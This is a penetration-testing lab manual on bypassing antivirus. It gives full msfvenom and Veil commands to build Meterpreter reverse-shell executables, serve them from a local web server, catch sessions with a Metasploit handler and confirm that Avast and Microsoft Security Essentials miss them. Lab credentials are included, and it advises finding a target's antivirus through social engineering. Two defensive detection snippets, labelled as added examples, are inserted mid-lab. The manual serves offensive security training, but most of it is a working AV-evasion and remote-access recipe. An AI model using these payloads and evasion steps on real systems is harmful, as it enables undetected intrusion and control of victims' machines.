
© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 1


In this lab you will work with malicious code and see how it can be used to bypass
AV solutions.

Victim01-Avast: 172.16.5.10
Victim02-MSE: 172.16.5.5
Network: 172.16.5.0
Pentester (your PC): 172.16.5.x

• Understand different techniques that can be used to bypass AV



• MSFpayload
• Veil

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired through the Tasks, you can achieve the Lab goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this paper and check
the solutions.

• Metasploit
• Veil

Lab machines are not connected to the internet.



Note: You might need to create more than one malicious code until you are able to bypass
both AV solutions (Avast and Microsoft Security Essentials).

Hint: In both systems (172.16.5.5 and 172.16.5.10), you can login via rdesktop, with the
username admin and the password et1@sR7!

Describe what command/tool/technique you have used in order to successfully complete
this task:



Describe what command/tool/technique you have used in order to successfully complete
this task:

Describe what command/tool/technique you have used in order to successfully complete
this task:

There are a couple of different techniques and tools we can use to create malicious code.
We will start with msfvenom, a command line tool that can generate many types of
shellcode and payload executables.

To see the (very long) list of available payloads, run the following command from the console:

root@kali:~/LABS/16# msfvenom -l

This is the command that will generate our first malicious code:

root@kali:~/LABS/16# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.50 LPORT=4444 -f exe > rTCP.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

Note: Check your VPN IP address, it might be different from 172.16.5.50.

Some information about the previous command:

• -p windows/meterpreter/reverse_tcp
The payload to embed in the executable. Once executed, it launches a reverse TCP
meterpreter shell back to our system at 172.16.5.50 on port 4444. We'll need to have
the multi/handler module running and waiting for incoming connections on that
port and IP.
• LHOST=172.16.5.50
Our listening IP address
• LPORT=4444
The listening port on which the victim will connect back. Keep in mind that with a
firewall in the middle of these systems we must pick a port that is allowed.
• -f exe
The file format



• > rTCP.exe
The executable will be saved in a file named rTCP.exe in the current folder.

Now we need to get our malicious file, rTCP.exe, onto the victim system 172.16.5.10.
To do this, we'll start a local web server with Python's "SimpleHTTPServer" module,
copy the shell into its web root, and later download the file from the victim machine.

root@kali:~/LABS/16# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we need to start the multi/handler exploit in Metasploit, so that something is
listening when the victim opens the rTCP.exe file.

Here's the exploit setup:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 172.16.5.50
LHOST => 172.16.5.50
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 172.16.5.50:4444
[*] Starting the payload handler...



Connect over RDP to our victim system:

root@kali:~/LABS/16# rdesktop 172.16.5.10 -u admin -p et1@sR7!

Since we are going to download our malicious shell, let's disable the Avast AV first. Open
Avast from the desktop icon, then go to Settings > Active Protection and disable all the
options:

Now, open Chrome and download the rTCP.exe from our webserver:



Run the executable we just downloaded. In Metasploit we should now have an active
meterpreter session, as follows:

[*] Started reverse TCP handler on 172.16.5.50:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.16.5.10
[*] Meterpreter session 1 opened (172.16.5.50:4444 -> 172.16.5.10:1057) at 2016-05-17 18:03:17 +0200

meterpreter >

Let's query the shell for some basic information, like the following:

meterpreter > sysinfo
Computer : VICTIM01-AVAST
OS : Windows 7 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32



Or, for example, we can run the calculator on the victim system:

meterpreter > execute -f calc.exe
Process 2788 created.

And in a similar way we can run other commands. But now, let's close the meterpreter
session by sending the quit command.

meterpreter > quit
[*] Shutting down Meterpreter...

[*] 172.16.5.10 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/handler) >



Let's go back to our victim RDP session and re-enable the antivirus. Now let's try to
download the shell again from Chrome. As you can see, the antivirus has blocked our file
because it is harmful to the system:



As a second attempt, let's try to encode our shell as follows:

root@kali:~/LABS/16# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.50 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 > rTCPenc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
root@kali:~/LABS/16# cp rTCPenc.exe /var/www/html/

Then download the new file, rTCPenc.exe, and check whether Avast is able to detect it:

As you can see, it was still detected by Avast.



Let's try another, very powerful, tool that can be used to bypass AVs: Veil.

In Kali we can install Veil following this guide: https://www.veil-framework.com/veil-is-available-in-kali-linux/ .

In newer versions of Kali (rolling), it can be installed with the following command:

root@kali:~/LABS/16# apt install veil-evasion

Once installed, just type veil to launch its menu:

root@kali:~/LABS/16# veil
===============================================================================
Veil | [Version]: 3.1.7
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

2 tools loaded

Available Tools:

1) Evasion
2) Ordnance

Available Commands:

exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool

Veil>:

Type “use 1” to load the Evasion menu.

Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================



Veil-Evasion Menu

41 payloads loaded

Available Commands:

back Go to Veil's main menu
checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload

Type list to check the complete list of available payloads:

Veil/Evasion>: list

[*] Available Payloads:

25) python/meterpreter/bind_tcp.py
26) python/meterpreter/rev_http.py
27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py



For this scenario, let's use the payload: python/meterpreter/rev_http.py (#26). So,
let's enter the command “use 26” in the menu console. Here's the new menu:

Veil/Evasion>: use 26
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload Information:

Name: Pure Python Reverse HTTP Stager
Language: python
Rating: Excellent
Description: pure windows/meterpreter/reverse_http stager, no shellcode

Payload: python/meterpreter/rev_http selected

Required Options:

Name Value Description
---- ----- -----------
CLICKTRACK X Optional: Minimum number of clicks to execute payload
COMPILE_TO_EXE Y Compile to an executable
CURSORMOVEMENT FALSE Check if cursor is in same position after 30 seconds
DETECTDEBUG FALSE Check if debugger is present
DOMAIN X Optional: Required internal domain
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual, Void, or Heap
LHOST The listen target address
LPORT 4444 The listen port
MINRAM FALSE Check for at least 3 gigs of RAM
PROCESSORS X Optional: Minimum number of processors
SANDBOXPROCESS FALSE Check for common sandbox processes
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Make user click prompt prior to execution
USE_PYHERION N Use the pyherion encrypter
UTCCHECK FALSE Optional: Validates system does not use UTC timezone
VIRTUALDLLS FALSE Check for dlls loaded in memory
VIRTUALFILES FALSE Optional: Check if VM supporting files exist

Available Commands:

back Go back to Veil-Evasion
exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option



[python/meterpreter/rev_http>>]:

Let's set up the payload as follows:

[python/meterpreter/rev_http>>]: set LPORT 4444
[i] LPORT => 4444
[python/meterpreter/rev_http>>]: set LHOST 172.16.5.50
[i] LHOST => 172.16.5.50



Once configured, let's generate our payload by sending the generate command:

[python/meterpreter/rev_http>>]: generate

Next, we need to assign a name for the malicious file that we are creating. In this example,
let’s use the name rTCPveil, no extension is needed:

[>] Please enter the base name for output files (default is payload): rTCPveil

After that, select the default executable option:

[?] How would you like to create your payload executable?

1 - PyInstaller (default)
2 - Py2Exe

[>] Please enter the number of your choice: 1

Here's the result of the executable:

[*] Language: python
[*] Payload Module: python/meterpreter/rev_http
[*] Executable written to: /var/lib/veil/output/compiled/rTCPveil.exe
[*] Source code written to: /var/lib/veil/output/source/rTCPveil.py
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/rTCPveil.rc

Hit enter to continue...

Then, once again, let's copy the executable created by Veil to our local directory, so we can
download it on the victim machine using the Python SimpleHTTPServer.

root@kali:~/LABS/16# cp /var/lib/veil/output/compiled/rTCPveil.exe .
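Veil built rTCPveil.exe with PyInstaller, which appends a Python archive and a fixed-format trailer (the "cookie") to a bootloader EXE. The following is an added example, not part of the lab or of Veil, showing how a defender can triage a sample for that trailer; it assumes the cookie layout and magic of PyInstaller 3.x/4.x, and the sample bytes it checks are constructed.

```python
import struct

# PyInstaller appends its archive to the bootloader EXE and ends it with a
# fixed 88-byte "cookie": 8-byte magic, package length, TOC offset, TOC
# length, Python version (e.g. 27 or 36) and a 64-byte Python library name.
# Assumption: layout as in PyInstaller 3.x/4.x; verify against the release
# that produced the sample you are triaging.
PYINST_MAGIC = b"MEI\014\013\012\013\016"
COOKIE = struct.Struct("!8sIIii64s")


def find_pyinstaller_cookie(data: bytes):
    """Return a dict describing the cookie if DATA carries a PyInstaller archive, else None."""
    idx = data.rfind(PYINST_MAGIC)
    if idx < 0 or idx + COOKIE.size > len(data):   # no magic, or truncated trailer
        return None
    magic, pkg_len, toc_off, toc_len, pyver, libname = COOKIE.unpack_from(data, idx)
    return {
        "cookie_offset": idx,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": pyver,
        "python_lib": libname.rstrip(b"\0").decode("ascii", "replace"),
    }


def triage_file(path: str):
    """Read a file from disk and run the cookie check on it."""
    with open(path, "rb") as fh:
        return find_pyinstaller_cookie(fh.read())


def constructed_sample() -> bytes:
    """Constructed stand-in for a bundled EXE: a fake MZ header, filler bytes and
    a cookie claiming a Python 2.7 bundle (not a real Veil output)."""
    body = b"MZ" + b"\x90" * 500
    cookie = COOKIE.pack(PYINST_MAGIC, 123456, 100, 200, 27, b"python27.dll")
    return body + cookie


if __name__ == "__main__":
    print(find_pyinstaller_cookie(constructed_sample()))
```

A hit only says the file is a PyInstaller bundle, which is also how many legitimate Python tools ship; it is a triage signal to combine with source, signer and behaviour, not a verdict.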



Now, let's launch the multi/handler exploit in Metasploit so we can receive the reverse
connection from the victim, but make sure to set the handler's payload to the
"reverse_http" payload, since that is what we used when creating the Veil payload:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 172.16.5.50
LHOST => 172.16.5.50
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://172.16.5.50:4444
[*] Starting the payload handler...

After that, connect to the system 172.16.5.10 (where Avast is installed and enabled),
download this new executable (rTCPveil.exe) and see whether the antivirus still detects it.

If everything went well, you will be able to download the executable successfully. Then go
back to the multi/handler exploit and check whether you got a meterpreter session from the
system 172.16.5.10 after the malware was run:

[*] Started HTTP reverse handler on http://172.16.5.50:4444
msf exploit(multi/handler) > [*] http://172.16.5.50:4444 handling request from 172.16.5.10; (UUID: b2nzvkq7) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (172.16.5.50:4444 -> 172.16.5.10:1069) at 2018-05-03 11:34:26 -0400

msf exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: VICTIM01-AVAST\admin
meterpreter >

Type ps in the meterpreter session and check whether you can see one of the Avast
executables still running on that system. That confirms we managed to get past Avast
unnoticed.



meterpreter > ps

Process List
============

PID   PPID  Name              Arch  Session  User                          Path
---   ----  ----              ----  -------  ----                          ----
0     0     [System Process]
4     0     System            x64   0
304   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
396   388   csrss.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
400   540   svchost.exe       x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
436   428   csrss.exe         x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
1092  540   AvastSvc.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\AVAST Software\Avast\AvastSvc.exe
1112  664   WmiPrvSE.exe      x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
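The handler output above shows the stager's first HTTP request and the staging of the payload. As an added example (not part of the lab), here is detection logic a defender could run over web-proxy logs to flag that staging request: Metasploit's reverse_http handler recognises its stager by an 8-bit checksum of the first URI path segment, so a request whose segment hits one of those checksum values, sent to a bare IP on a non-standard port, deserves an alert. The proxy log lines are constructed, and the checksum values are taken from Metasploit's Rex URI checksum convention, to be verified against the framework version in use.

```python
import re
from urllib.parse import urlsplit

# Stager URI checksums used by Metasploit's reverse_http(s) handler: the 8-bit
# sum of the first path segment's bytes. Values as in Metasploit's Rex URI
# checksum module; verify against the framework version you are modelling.
URI_CHECKSUMS = {92: "INITW (native stager)", 80: "INITP (python stager)",
                 88: "INITJ (java stager)", 98: "CONN", 95: "INIT_CONN"}
SEGMENT_CHARS = re.compile(r"[A-Za-z0-9_-]+")
BARE_IP = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
COMMON_HTTP_PORTS = {80, 443, 8080}

# Constructed proxy log lines: "timestamp client method url status bytes".
CONSTRUCTED_PROXY_LOG = """\
1525361666 172.16.5.10 GET http://172.16.5.50:4444/cFcP 200 180825
1525361670 172.16.5.10 GET http://example.org/index.html 200 5123
1525361671 172.16.5.11 GET http://172.16.5.50:4444/favicon.ico 404 0
1525361672 172.16.5.12 GET http://example.org/cFcP 200 77
"""

def uri_checksum(segment: str) -> int:
    """8-bit checksum of a URI segment, as the Metasploit handler computes it."""
    return sum(segment.encode("ascii", "ignore")) % 0x100

def first_segment(url: str) -> str:
    """First path segment, without the leading '/' or any query string."""
    return urlsplit(url).path.lstrip("/").split("/", 1)[0]

def score_request(url: str) -> list:
    """Indicators that fire for one URL; the checksum hit, if any, comes first."""
    parts, seg, hits = urlsplit(url), first_segment(url), []
    if SEGMENT_CHARS.fullmatch(seg) and uri_checksum(seg) in URI_CHECKSUMS:
        hits.append("uri-checksum:" + URI_CHECKSUMS[uri_checksum(seg)])
    if parts.hostname and BARE_IP.fullmatch(parts.hostname):
        hits.append("bare-ip-host")
    if parts.port and parts.port not in COMMON_HTTP_PORTS:
        hits.append("nonstandard-port:%d" % parts.port)
    return hits

def scan_log(text: str) -> list:
    """(client, url, hits) for lines where the checksum fires with a corroborating indicator."""
    findings = []   # the checksum alone matches 1 random path in 256, so never alert on it alone
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue
        hits = score_request(fields[3])
        if len(hits) >= 2 and hits[0].startswith("uri-checksum"):
            findings.append((fields[1], fields[3], hits))
    return findings
```

On the constructed log only the first line is reported: the favicon request lacks the checksum, and the example.org request lacks any corroborating indicator.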

We do not recommend uploading malicious files generated by any source (msfvenom, Veil,
etc.) to online AV scanners like www.virustotal.com, because these files are later shared
with AV companies, who will be able to create signatures to catch them. The best thing to
do is first find out what AV solution your target (the customer) uses (check job posts and
forums to see whether it is published somewhere; you may also use your social engineering
skills (call and ask), and you will be surprised how readily people share this information).
Then download a trial version of the AV solution used by your customer in a lab environment
and update it to the latest virus definitions. Once you are able to bypass it, you can deliver
the piece of code, provided that it is part of your engagement's scope.

I have uploaded the piece of code generated by Veil (following the steps above) to
VirusTotal so you can get an idea of how powerful it really is (only 3 of 50 vendors
detected it):



Repeat the steps from Task 3, this time on the system 172.16.5.5, which is running
Microsoft Security Essentials.

If everything goes well, the same piece of malware generated by Veil (above) should bypass
MSE as well.
